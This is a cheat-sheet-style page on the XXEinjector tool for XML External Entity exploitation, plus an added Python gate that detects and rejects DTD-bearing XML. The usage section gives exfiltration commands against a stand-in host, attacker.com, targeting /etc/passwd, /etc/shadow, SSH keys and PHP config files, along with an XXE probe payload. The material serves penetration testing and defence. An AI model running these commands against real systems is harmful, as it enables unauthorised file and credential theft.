Description
XXEinjector automates XXE (XML External Entity) exploitation. It supports direct and out-of-band (OOB) data exfiltration via HTTP and FTP protocols. Critical for testing XML-based APIs and file upload endpoints.
Installation
```bash
git clone https://github.com/enjoiz/XXEinjector.git
cd XXEinjector
# Requires Ruby
ruby XXEinjector.rb --help
```
Basic Usage
```bash
# Basic file extraction. Note the flag semantics: --file is a saved HTTP request
# containing the XML body (mark the DTD injection point with XXEINJECT if needed),
# --path is the remote file or directory to retrieve, --host is the listener
# address for the out-of-band channel and --httpport the port that serves the DTD.
ruby XXEinjector.rb --host=attacker.com --file=req.txt --path=/etc/passwd --httpport=8080
# With authentication: the tool replays the saved request as-is, so the session
# cookie (or any other auth header) goes into req.txt, e.g. a header line
# "Cookie: session=abc", rather than on the command line.
ruby XXEinjector.rb --host=attacker.com --file=req.txt --path=/etc/passwd
```
Advanced Usage
```bash
# OOB via FTP (FTP is the default OOB channel; the DTD itself is still served over HTTP)
ruby XXEinjector.rb --host=attacker.com --file=req.txt \
--path=/etc/passwd --oob=ftp --ftpport=2121
# Enumerate directories: --path names the remote directory
ruby XXEinjector.rb --host=attacker.com --file=req.txt \
--path=/etc/ --oob=http
# Enumerate which outbound ports the target can reach for the reverse connection
ruby XXEinjector.rb --host=attacker.com --file=req.txt --enumports=80
# CDATA extraction (for special characters)
ruby XXEinjector.rb --host=attacker.com --file=req.txt \
--path=/etc/passwd --cdata
# PHP filter wrapper: --phpfilter base64-encodes the target file before it is
# returned, so PHP source survives the XML parser
ruby XXEinjector.rb --host=attacker.com --file=req.txt \
--path=/var/www/html/config.php --phpfilter --oob=http
# HTTPS target
ruby XXEinjector.rb --host=attacker.com --file=req.txt \
--path=/etc/passwd --ssl
```
Common Workflows
```bash
# Step 1: Test for XXE
# Inject in a request with Content-Type: application/xml
# <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://callback.oast.fun/xxe">]>
# <root>&xxe;</root>
# Step 2: If an OOB callback is received, save the full HTTP request (headers and
# XML body) to req.txt and use XXEinjector for data exfil. The target host and
# endpoint come from that saved request (add --ssl for HTTPS).
ruby XXEinjector.rb --host=attacker.com --file=req.txt \
--path=/etc/passwd --oob=http --httpport=8080
# Step 3: Read sensitive files
# /etc/passwd, /etc/shadow, ~/.ssh/id_rsa, /proc/self/environ
```
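The other side of the Step 1 probe is the parser that receives it. The following is an added example, not code from XXEinjector or its author: a small Python gate using only the standard library's expat binding that reports what an incoming XML body declares (DOCTYPE name, external and internal entities), refuses to resolve any external entity so the out-of-band callback never fires, and rejects any document carrying a DOCTYPE before it reaches the application parser. The sample bodies and the callback host `callback.example.invalid` are constructed placeholders, not values from the page.

```python
"""Defender-side gate for XXE probes of the kind shown in Step 1.

Added example (not part of XXEinjector). Uses only the Python standard
library: xml.parsers.expat to inspect the DTD without resolving anything,
and xml.etree.ElementTree for the final parse of documents that pass.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when an untrusted document carries a DOCTYPE (and thus may declare entities)."""


def inspect_xml(data: bytes) -> dict:
    """Parse with external entity resolution disabled and report what the DTD declared.

    Nothing is fetched from the network or the filesystem: the external entity
    handler returns 0, which makes expat abort instead of resolving the reference.
    """
    findings = {
        "doctype": None,           # name from <!DOCTYPE name ...>, or None
        "external_entities": [],   # (name, "general"|"parameter", SYSTEM/PUBLIC id)
        "internal_entities": [],   # (name, kind) for inline values (entity-expansion material)
        "external_ref_blocked": False,
        "parse_error": None,
    }

    parser = expat.ParserCreate()
    # Never load an external DTD subset or external parameter entities.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings["doctype"] = name

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        kind = "parameter" if is_param else "general"
        if system_id is not None or public_id is not None:
            findings["external_entities"].append((name, kind, system_id or public_id))
        else:
            findings["internal_entities"].append((name, kind))

    def on_external_ref(context, base, system_id, public_id):
        # Returning 0 refuses the reference; expat raises an error and stops here.
        findings["external_ref_blocked"] = True
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref

    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        findings["parse_error"] = str(exc)
    return findings


def parse_untrusted(data: bytes) -> ET.Element:
    """Accept XML from an untrusted client only if it declares no DOCTYPE at all.

    Without a DOCTYPE there is nowhere to declare an entity, so neither OOB
    exfiltration nor entity expansion applies; this is the usual hardening rule.
    """
    findings = inspect_xml(data)
    if findings["doctype"] is not None:
        raise UnsafeXML(f"DOCTYPE {findings['doctype']!r} rejected; declared: {findings}")
    return ET.fromstring(data)


# Constructed samples: the Step 1 probe with a non-routable placeholder host,
# an entity-expansion body, and a clean body that should pass.
XXE_PROBE = (
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://callback.example.invalid/xxe">]>'
    b"<root>&xxe;</root>"
)
EXPANSION_BODY = (
    b'<!DOCTYPE lol [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;">]>'
    b"<root>&lol2;</root>"
)
CLEAN_BODY = b"<root><item>ok</item></root>"

if __name__ == "__main__":
    for body in (XXE_PROBE, EXPANSION_BODY, CLEAN_BODY):
        print(inspect_xml(body))
        try:
            print("accepted root tag:", parse_untrusted(body).tag)
        except UnsafeXML as exc:
            print("rejected:", exc)
```

Running the script shows the probe being recorded as a `foo` DOCTYPE with one external general entity and `external_ref_blocked` set, and both DTD-bearing bodies rejected while the clean body parses. The findings dict is what you would log or feed to a detection pipeline, since the DTD contents are normally invisible in access logs.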